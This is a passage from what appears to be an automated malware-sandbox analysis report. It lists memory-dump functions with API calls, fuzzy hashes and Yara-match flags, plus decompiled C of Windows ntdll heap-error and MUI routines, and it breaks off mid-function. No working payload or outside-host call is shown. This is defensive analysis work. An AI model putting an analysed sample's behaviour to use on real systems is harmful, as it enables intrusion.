                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: 04cf8c0363711b3f7b3c9913b430aa2ef8eae10354c16a43ecb05125a6fbc56c
                                                                              • Instruction ID: 35da7bba118a46eab94dddfe866e31208d7a045f1d8f16806097141380d41ec2
                                                                              • Opcode Fuzzy Hash: 04cf8c0363711b3f7b3c9913b430aa2ef8eae10354c16a43ecb05125a6fbc56c
                                                                              • Instruction Fuzzy Hash: 2A90027124500806D1907199C404A4A5005A7D5341F91C025E0015658DCA558A5977E1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017796E0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: b9b517e35b1c94f1aca79bc310ca0b8a9ed53c8b98d700d182df391e4aaf2bba
                                                                              • Instruction ID: 5fc2c1157e5e3468d3fcd5ea2616ea22a04fd49ff419266a686798a928020df1
                                                                              • Opcode Fuzzy Hash: b9b517e35b1c94f1aca79bc310ca0b8a9ed53c8b98d700d182df391e4aaf2bba
                                                                              • Instruction Fuzzy Hash: F890027124508806D1207199C404B4A5005A7D4341F55C421E441465CDC6D588917161
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 00409A90, Relevance: .1, Instructions: 92COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                              • Instruction ID: 3804b4b6881f0f279124858c5e35b72bf87e4fbc11d5a75f000cd7e24852ad46
                                                                              • Opcode Fuzzy Hash: 1da3a0a51de53f8e4f95f41efafe70bd92c6e1b826fb8f0c5d51986441d80343
                                                                              • Instruction Fuzzy Hash: 64213CB2D4020857CB25D664AD42AEF737CEB54308F04017FE949A3182F7387E49CBA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004082EA, Relevance: 1.6, APIs: 1, Instructions: 56threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: 4e23822c86d86cfc0aa2f1c10c15cb23370e4a3e39196690550920d5949fe68c
                                                                              • Instruction ID: cfa00a07b1aa70c4f127d76168ec66dfc5b8fa0f0f423e136a247d81e356ac5a
                                                                              • Opcode Fuzzy Hash: 4e23822c86d86cfc0aa2f1c10c15cb23370e4a3e39196690550920d5949fe68c
                                                                              • Instruction Fuzzy Hash: E4014031A402187AE72066558C43FFE772CAB40F55F04401DFF04B91C1D6B8290647E9
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 004082F0, Relevance: 1.6, APIs: 1, Instructions: 55threadwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessagePostThread
                                                                              • String ID:
                                                                              • API String ID: 1836367815-0
                                                                              • Opcode ID: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                              • Instruction ID: 99221eaed4bb2b1c73ef210b546efabe7985b039c1aa6a3efaa8447a865c7254
                                                                              • Opcode Fuzzy Hash: afab1aa1c4a0f2d606ceb08e1db99e52839e25c93945885a0af06a200761294b
                                                                              • Instruction Fuzzy Hash: 7601D831A8031876E720A6959C43FFE772C6B40F54F044019FF04BA1C1D6A8691646EA
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A0A4, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: 76d52d06a02a09366433456c448a014b5b17165752531a60b9cb123cfe6be029
                                                                              • Instruction ID: 613cfd4b8a205081ac7a2eb5e1428e672729e9bde2f84031fe04dfb314773708
                                                                              • Opcode Fuzzy Hash: 76d52d06a02a09366433456c448a014b5b17165752531a60b9cb123cfe6be029
                                                                              • Instruction Fuzzy Hash: 660129B1205109AFCB24DF98DC80DEB77A9AF8C710F158249BA4CA7201D634ED558BA5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A069, Relevance: 1.5, APIs: 1, Instructions: 28memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: 3e811a33a3b65c7b9a9e3b25a06fa4e4141f9cdacb4c54195455881a6481665d
                                                                              • Instruction ID: 7c635586a7735a4f22b24a2a5efc92f724fdd51c2c95f9ab9e21ae08a81323c1
                                                                              • Opcode Fuzzy Hash: 3e811a33a3b65c7b9a9e3b25a06fa4e4141f9cdacb4c54195455881a6481665d
                                                                              • Instruction Fuzzy Hash: 42E0EDB12102046BD714DF55CC85EE777ADEF89660F058559B94857642C630E9548BB0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A070, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlFreeHeap.NTDLL(00000060,00409CD3,?,?,00409CD3,00000060,00000000,00000000,?,?,00409CD3,?,00000000), ref: 0041A09D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: FreeHeap
                                                                              • String ID:
                                                                              • API String ID: 3298025750-0
                                                                              • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                              • Instruction ID: ebe44f756a2289fd31ae4d5b5361048190c1dc89d00c79db85c43397b2838655
                                                                              • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                              • Instruction Fuzzy Hash: 81E01AB12102086BD714DF59CC45EA777ACEF88750F018559B90857241C630E9108AB0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RtlAllocateHeap.NTDLL(00414506,?,00414C7F,00414C7F,?,00414506,?,?,?,?,?,00000000,00409CD3,?), ref: 0041A05D
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: AllocateHeap
                                                                              • String ID:
                                                                              • API String ID: 1279760036-0
                                                                              • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                              • Instruction ID: 0bf4e0d92ddb4de2ba6a166865ddf054dca1a4f918bcd24d9368b88a9b8aca1a
                                                                              • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                              • Instruction Fuzzy Hash: F1E012B1210208ABDB14EF99CC81EA777ACEF88664F158559BA086B242C630F9108AB0
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F1A2,0040F1A2,0000003C,00000000,?,00409D45), ref: 0041A200
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LookupPrivilegeValue
                                                                              • String ID:
                                                                              • API String ID: 3899507212-0
                                                                              • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                              • Instruction ID: 46e8f913edfca5d9b668009ee454d724baa27d6f5a7db77fbc9955010344b6d9
                                                                              • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                              • Instruction Fuzzy Hash: 22E01AB12002086BDB10DF49CC85EE737ADEF88650F018555BA0C67241C934E8508BF5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0041A0B0, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A0D8
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.474894735.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ExitProcess
                                                                              • String ID:
                                                                              • API String ID: 621844428-0
                                                                              • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                              • Instruction ID: eb2c75e7f7166c4cf28644cd9339eacac336c717648a3dafe3de7fd5e277bb7f
                                                                              • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                              • Instruction Fuzzy Hash: 4CD017726102187BD620EB99CC85FD777ACDF48BA0F0584A9BA5C6B242C531BA108AE1
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 0177967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID: InitializeThunk
                                                                              • String ID:
                                                                              • API String ID: 2994545307-0
                                                                              • Opcode ID: e52c5476a837171dc8a978811fbc4c23597294151a432131ad7c373fcd3f6cb1
                                                                              • Instruction ID: 8d8b8b9df7de148bfabd18389c0285160d661019b1c164103e54c779b07a4feb
                                                                              • Opcode Fuzzy Hash: e52c5476a837171dc8a978811fbc4c23597294151a432131ad7c373fcd3f6cb1
                                                                              • Instruction Fuzzy Hash: 39B09B719464C5C9DA11E7A48608F17F90077D4755F16C171D2024645B4778C091F5B5
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Non-executed Functions

                                                                              Function 017EB260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                                              Download Yara Rule
                                                                              Strings
                                                                              • *** An Access Violation occurred in %ws:%s, xrefs: 017EB48F
                                                                              • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 017EB39B
                                                                              • The instruction at %p referenced memory at %p., xrefs: 017EB432
                                                                              • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 017EB305
                                                                              • *** enter .exr %p for the exception record, xrefs: 017EB4F1
                                                                              • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 017EB476
                                                                              • write to, xrefs: 017EB4A6
                                                                              • *** enter .cxr %p for the context, xrefs: 017EB50D
                                                                              • read from, xrefs: 017EB4AD, 017EB4B2
                                                                              • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 017EB484
                                                                              • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 017EB53F
                                                                              • an invalid address, %p, xrefs: 017EB4CF
                                                                              • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 017EB47D
                                                                              • *** A stack buffer overrun occurred in %ws:%s, xrefs: 017EB2F3
                                                                              • *** Resource timeout (%p) in %ws:%s, xrefs: 017EB352
                                                                              • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB3D6
                                                                              • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 017EB323
                                                                              • This failed because of error %Ix., xrefs: 017EB446
                                                                              • The critical section is owned by thread %p., xrefs: 017EB3B9
                                                                              • *** then kb to get the faulting stack, xrefs: 017EB51C
                                                                              • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 017EB314
                                                                              • *** Inpage error in %ws:%s, xrefs: 017EB418
                                                                              • Go determine why that thread has not released the critical section., xrefs: 017EB3C5
                                                                              • The instruction at %p tried to %s , xrefs: 017EB4B6
                                                                              • The resource is owned shared by %d threads, xrefs: 017EB37E
                                                                              • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 017EB2DC
                                                                              • a NULL pointer, xrefs: 017EB4E0
                                                                              • The resource is owned exclusively by thread %p, xrefs: 017EB374
                                                                              • <unknown>, xrefs: 017EB27E, 017EB2D1, 017EB350, 017EB399, 017EB417, 017EB48E
                                                                              • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 017EB38F
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                                              • API String ID: 0-108210295
                                                                              • Opcode ID: ffbb633c31583176b958083514b74cd13b4826a55fd77658c977be8cf3e48d4d
                                                                              • Instruction ID: 2078786cc64fa6bc0757e2697b06f268a654d40d79fd040114afe7d949142c38
                                                                              • Opcode Fuzzy Hash: ffbb633c31583176b958083514b74cd13b4826a55fd77658c977be8cf3e48d4d
                                                                              • Instruction Fuzzy Hash: 4D8106B5A40220FFDB316A8ACC5ED7BFFA5EF5AB51F40408CF5046B116D2629492C7B2
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 017F1C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 44%
                                                                              			E017F1C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17148a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0173B150();
				} else {
					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x182589c);
				E0173B150("Heap error detected at %p (heap handle %p)\n",  *0x18258a0);
				_t27 =  *0x1825898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M017F1E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0173B150();
				} else {
					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E0173B150("Error code: %d - %s\n",  *0x1825898);
				_t113 =  *0x18258a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0173B150("Parameter1: %p\n",  *0x18258a4);
				}
				_t115 =  *0x18258a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0173B150("Parameter2: %p\n",  *0x18258a8);
				}
				_t117 =  *0x18258ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E0173B150("Parameter3: %p\n",  *0x18258ac);
				}
				_t119 =  *0x18258b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E0173B150();
					} else {
						E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18258b4);
					E0173B150("Last known valid blocks: before - %p, after - %p\n",  *0x18258b0);
				} else {
					_t120 =  *0x18258b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E0173B150();
				} else {
					E0173B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E0173B150("Stack trace available at %p\n", 0x18258c0);
			}











                                                                              0x017f1c10
                                                                              0x017f1c16
                                                                              0x017f1c1e
                                                                              0x017f1c3d
                                                                              0x017f1c3e
                                                                              0x017f1c20
                                                                              0x017f1c35
                                                                              0x017f1c3a
                                                                              0x017f1c44
                                                                              0x017f1c55
                                                                              0x017f1c5a
                                                                              0x017f1c65
                                                                              0x017f1c67
                                                                              0x00000000
                                                                              0x017f1c6e
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017f1c67
                                                                              0x017f1cdc
                                                                              0x017f1ce5
                                                                              0x017f1d04
                                                                              0x017f1d05
                                                                              0x017f1ce7
                                                                              0x017f1cfc
                                                                              0x017f1d01
                                                                              0x017f1d0b
                                                                              0x017f1d17
                                                                              0x017f1d1f
                                                                              0x017f1d25
                                                                              0x017f1d30
                                                                              0x017f1d4f
                                                                              0x017f1d50
                                                                              0x017f1d32
                                                                              0x017f1d47
                                                                              0x017f1d4c
                                                                              0x017f1d61
                                                                              0x017f1d67
                                                                              0x017f1d68
                                                                              0x017f1d6e
                                                                              0x017f1d79
                                                                              0x017f1d98
                                                                              0x017f1d99
                                                                              0x017f1d7b
                                                                              0x017f1d90
                                                                              0x017f1d95
                                                                              0x017f1daa
                                                                              0x017f1db0
                                                                              0x017f1db1
                                                                              0x017f1db7
                                                                              0x017f1dc2
                                                                              0x017f1de1
                                                                              0x017f1de2
                                                                              0x017f1dc4
                                                                              0x017f1dd9
                                                                              0x017f1dde
                                                                              0x017f1df3
                                                                              0x017f1df9
                                                                              0x017f1dfa
                                                                              0x017f1e00
                                                                              0x017f1e0a
                                                                              0x017f1e13
                                                                              0x017f1e32
                                                                              0x017f1e33
                                                                              0x017f1e15
                                                                              0x017f1e2a
                                                                              0x017f1e2f
                                                                              0x017f1e39
                                                                              0x017f1e4a
                                                                              0x017f1e02
                                                                              0x017f1e02
                                                                              0x017f1e08
                                                                              0x00000000
                                                                              0x00000000
                                                                              0x017f1e08
                                                                              0x017f1e5b
                                                                              0x017f1e7a
                                                                              0x017f1e7b
                                                                              0x017f1e5d
                                                                              0x017f1e72
                                                                              0x017f1e77
                                                                              0x017f1e95

                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000008.00000002.476375821.0000000001710000.00000040.00000001.sdmp, Offset: 01710000, based on PE: true
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                                              • API String ID: 0-2897834094
                                                                              • Opcode ID: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                              • Instruction ID: 5757da4b58ecb61db55a2815a4b5d42cc65b3a056331bd264293c403ad5461a6
                                                                              • Opcode Fuzzy Hash: d44620f31007172ead41c45aaaf57e7be9c68bb6f01141b018e0e4cab8a43839
                                                                              • Instruction Fuzzy Hash: 6F61D473554155DFD221AB8DD498E36F3A4EB04A30F4980BFFB095B345DAB49982CF0A
                                                                              Uniqueness

                                                                              Uniqueness Score: -1.00%

                                                                              Function 01743D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                              Download Yara Rule
                                                                              C-Code - Quality: 96%
                                                                              			E01743D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E01741B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E01741B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E01741B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E01741B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E01741B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L01754620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E0177F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E01781370(_t276, 0x1714e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E0177BB40(0,  &_v68, _t170);
									if(L017443C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L017577F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E0177BB40(_t257,  &_v68, _t243);
								if(L017443C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E01781370(_t278, 0x1714e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L01754620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E0177F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E01781370(_v16, 0x1714e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
